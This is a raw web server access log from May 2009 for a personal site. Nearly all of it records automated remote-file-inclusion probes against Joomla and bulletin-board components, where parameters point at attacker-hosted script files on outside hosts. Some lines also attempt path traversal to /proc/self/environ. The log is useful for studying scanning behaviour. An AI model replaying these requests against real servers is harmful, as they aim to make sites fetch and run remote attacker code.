80.23.181.2 - - [05/May/2009:09:29:54 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://genericshears.com/blog/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:29:57 -0700] "GET /index.php?incl=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 200 42941 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:30:09 -0700] "GET /logs//logs/index.php?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:30:09 -0700] "GET /logs/index.php?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:30:09 -0700] "GET /logs/access_080831.log%20%20//logs/index.php?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:30:09 -0700] "GET /logs/access_080412.log%20%20//logs/index.php?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:30:12 -0700] "GET /logs/index.php?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:30:12 -0700] "GET /logs//logs/index.php?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:30:12 -0700] "GET /logs/access_080412.log%20%20//logs/index.php?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:30:12 -0700] "GET /logs/access_080831.log%20%20//logs/index.php?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:30:17 -0700] "GET /logs/access_080412.log//logs/index.php?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:30:17 -0700] "GET /logs/access_080831.log//logs/index.php?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:30:17 -0700] "GET /logs//logs/index.php?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:30:17 -0700] "GET /logs/index.php?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:30:18 -0700] "GET /logs/access_080412.log//logs/index.php?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:30:18 -0700] "GET /logs/access_080831.log//logs/index.php?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:30:18 -0700] "GET /logs//logs/index.php?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:30:18 -0700] "GET /logs/index.php?sourcedir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:30:18 -0700] "GET /index.php?incl=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 200 42941 "-" "Mozilla/5.0" "www.dmulk.com"
64.13.231.70 - - [05/May/2009:09:30:21 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.13.231.70 - - [05/May/2009:09:30:21 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.13.231.70 - - [05/May/2009:09:30:21 -0700] "GET /logs/access_080320.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:30:24 -0700] "GET /bbs/skin/zero_vote/login.php?dir=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:30:24 -0700] "GET /logs/access_080107.log//bbs/skin/zero_vote/login.php?dir=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:30:24 -0700] "GET /logs//bbs/skin/zero_vote/login.php?dir=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:30:24 -0700] "GET /bbs/skin/zero_vote/login.php?dir=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:30:25 -0700] "GET /logs//bbs/skin/zero_vote/login.php?dir=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:30:25 -0700] "GET /logs/access_080107.log%20%20//bbs/skin/zero_vote/login.php?dir=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:30:25 -0700] "GET /logs/access_080109.log//bbs/skin/zero_vote/login.php?dir=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:30:25 -0700] "GET /logs/access_080109.log%20%20//bbs/skin/zero_vote/login.php?dir=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.13.231.70 - - [05/May/2009:09:30:25 -0700] "GET /logs/access_080502.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.197.128.4 - - [05/May/2009:09:30:37 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.197.128.4 - - [05/May/2009:09:30:37 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.197.128.4 - - [05/May/2009:09:30:37 -0700] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.197.128.4 - - [05/May/2009:09:30:37 -0700] "GET /logs/access_081201.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.214.171.106 - - [05/May/2009:09:30:39 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.214.171.106 - - [05/May/2009:09:30:39 -0700] "GET /logs/access_080313.log/components/com_forum/download.php?phpbb_root_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.214.171.106 - - [05/May/2009:09:30:39 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.214.171.106 - - [05/May/2009:09:30:39 -0700] "GET /logs/access_080208.log/components/com_forum/download.php?phpbb_root_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
168.143.19.89 - - [05/May/2009:09:30:46 -0700] "GET /logs/access_080627.log/main.php?id=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
168.143.19.89 - - [05/May/2009:09:30:46 -0700] "GET /main.php?id=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
168.143.19.89 - - [05/May/2009:09:30:46 -0700] "GET /logs/main.php?id=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
168.143.19.89 - - [05/May/2009:09:30:48 -0700] "GET /logs/access_080627.log/main.php?id=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
168.143.19.89 - - [05/May/2009:09:30:48 -0700] "GET /main.php?id=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
168.143.19.89 - - [05/May/2009:09:30:48 -0700] "GET /logs/main.php?id=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
194.109.22.107 - - [05/May/2009:09:31:11 -0700] "GET /logs/access_080805.log///vwar/backup/errors.php?error=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.dmulk.com"
194.109.22.107 - - [05/May/2009:09:31:11 -0700] "GET //vwar/backup/errors.php?error=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.dmulk.com"
194.109.22.107 - - [05/May/2009:09:31:12 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.lehrer-zimmer.net//components/com_simpleboard/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:31:26 -0700] "GET /logs/access_080523.log%20%20//index.php?incl=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:09:31:26 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:31:29 -0700] "GET /logs/access_081127.log%20%20//index.php?incl=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:31:29 -0700] "GET /logs//index.php?incl=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:09:31:41 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:32:00 -0700] "GET /index.php?incl=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:09:32:06 -0700] "GET /logs/access_081222.log%20%20/errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:09:32:16 -0700] "GET /skin/zero_vote/error.php?%20dir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:09:32:16 -0700] "GET /logs/access_081106.log//skin/zero_vote/error.php?%20dir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:09:32:16 -0700] "GET /logs//skin/zero_vote/error.php?%20dir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.151.161.240 - - [05/May/2009:09:32:28 -0700] "GET /logs/access_080531.log//skin/zero_vote/error.php?%20dir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:32:30 -0700] "GET /bbs/skin/zero_vote/login.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:32:30 -0700] "GET /logs//bbs/skin/zero_vote/login.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:32:30 -0700] "GET /logs/access_080107.log//bbs/skin/zero_vote/login.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:32:30 -0700] "GET /logs/access_080109.log//bbs/skin/zero_vote/login.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:32:37 -0700] "GET /bbs/skin/zero_vote/login.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:32:37 -0700] "GET /logs/access_080107.log//bbs/skin/zero_vote/login.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:32:37 -0700] "GET /logs//bbs/skin/zero_vote/login.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:32:37 -0700] "GET /logs/access_080109.log//bbs/skin/zero_vote/login.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:32:37 -0700] "GET /bbs/skin/zero_vote/login.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:32:37 -0700] "GET /logs//bbs/skin/zero_vote/login.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:32:37 -0700] "GET /logs/access_080107.log%20%20//bbs/skin/zero_vote/login.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:32:37 -0700] "GET /logs/access_080109.log%20%20//bbs/skin/zero_vote/login.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:32:39 -0700] "GET /bbs/skin/zero_vote/login.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:32:39 -0700] "GET /logs//bbs/skin/zero_vote/login.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:32:39 -0700] "GET /logs/access_080107.log%20%20//bbs/skin/zero_vote/login.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:32:39 -0700] "GET /logs/access_080109.log%20%20//bbs/skin/zero_vote/login.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:09:32:44 -0700] "GET /logs/access_081117.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=%20&mosConfig_absolute_path=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:09:32:44 -0700] "GET /logs/access_081117.log/errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:09:32:45 -0700] "GET /logs/access_081117.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=%20&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
91.202.4.158 - - [05/May/2009:09:32:45 -0700] "GET /logs/access_081117.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=%20&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
64.13.231.70 - - [05/May/2009:09:32:49 -0700] "GET /logs/access_080320.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.13.231.70 - - [05/May/2009:09:32:49 -0700] "GET /logs/access_080502.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.197.128.4 - - [05/May/2009:09:33:13 -0700] "GET /logs/access_080719.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.197.128.4 - - [05/May/2009:09:33:13 -0700] "GET /logs/access_081201.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.226.153.1 - - [05/May/2009:09:33:13 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [05/May/2009:09:33:17 -0700] "GET /logs/access_080809.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:33:26 -0700] "GET /logs/access_080520.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.233.69.41 - - [05/May/2009:09:33:29 -0700] "GET /zentrack/index.php?configFile=http://stelsis.ru/templates/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.233.69.41 - - [05/May/2009:09:33:29 -0700] "GET /logs/access_080412.log//zentrack/index.php?configFile=http://stelsis.ru/templates/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.233.69.41 - - [05/May/2009:09:33:29 -0700] "GET /logs//zentrack/index.php?configFile=http://stelsis.ru/templates/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:33:29 -0700] "GET /logs/access_080807.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.226.153.1 - - [05/May/2009:09:33:57 -0700] "GET /logs/access_080219.log%20%20//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.226.153.1 - - [05/May/2009:09:33:57 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.226.153.1 - - [05/May/2009:09:33:57 -0700] "GET /logs//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.233.69.41 - - [05/May/2009:09:34:20 -0700] "GET /logs/access_080512.log//zentrack/index.php?configFile=http://stelsis.ru/templates/fxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.214.171.106 - - [05/May/2009:09:34:24 -0700] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.214.171.106 - - [05/May/2009:09:34:24 -0700] "GET /logs/access_080313.log/components/com_forum/download.php?phpbb_root_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.214.171.106 - - [05/May/2009:09:34:24 -0700] "GET /logs/access_080208.log/components/com_forum/download.php?phpbb_root_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.214.171.106 - - [05/May/2009:09:34:24 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:34:29 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:34:29 -0700] "GET /logs/access_090415.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:34:29 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
168.143.19.89 - - [05/May/2009:09:34:30 -0700] "GET /logs/access_080622.log/main.php?id=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
168.143.19.89 - - [05/May/2009:09:34:34 -0700] "GET /logs/access_080622.log/main.php?id=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:34:34 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:34:48 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:34:48 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:34:49 -0700] "GET /logs/access_090415.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:09:34:50 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:09:34:50 -0700] "GET /logs/access_080227.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.150 - - [05/May/2009:09:34:50 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.230 - - [05/May/2009:09:35:13 -0700] "GET /logs/access_080227.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.wg.com.pl/downloads/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
72.55.164.230 - - [05/May/2009:09:35:13 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.wg.com.pl/downloads/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
72.55.164.230 - - [05/May/2009:09:35:13 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.wg.com.pl/downloads/pw.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
64.13.231.70 - - [05/May/2009:09:35:32 -0700] "GET /logs/access_080323.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:35:32 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:35:32 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:35:33 -0700] "GET /logs/access_080320.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
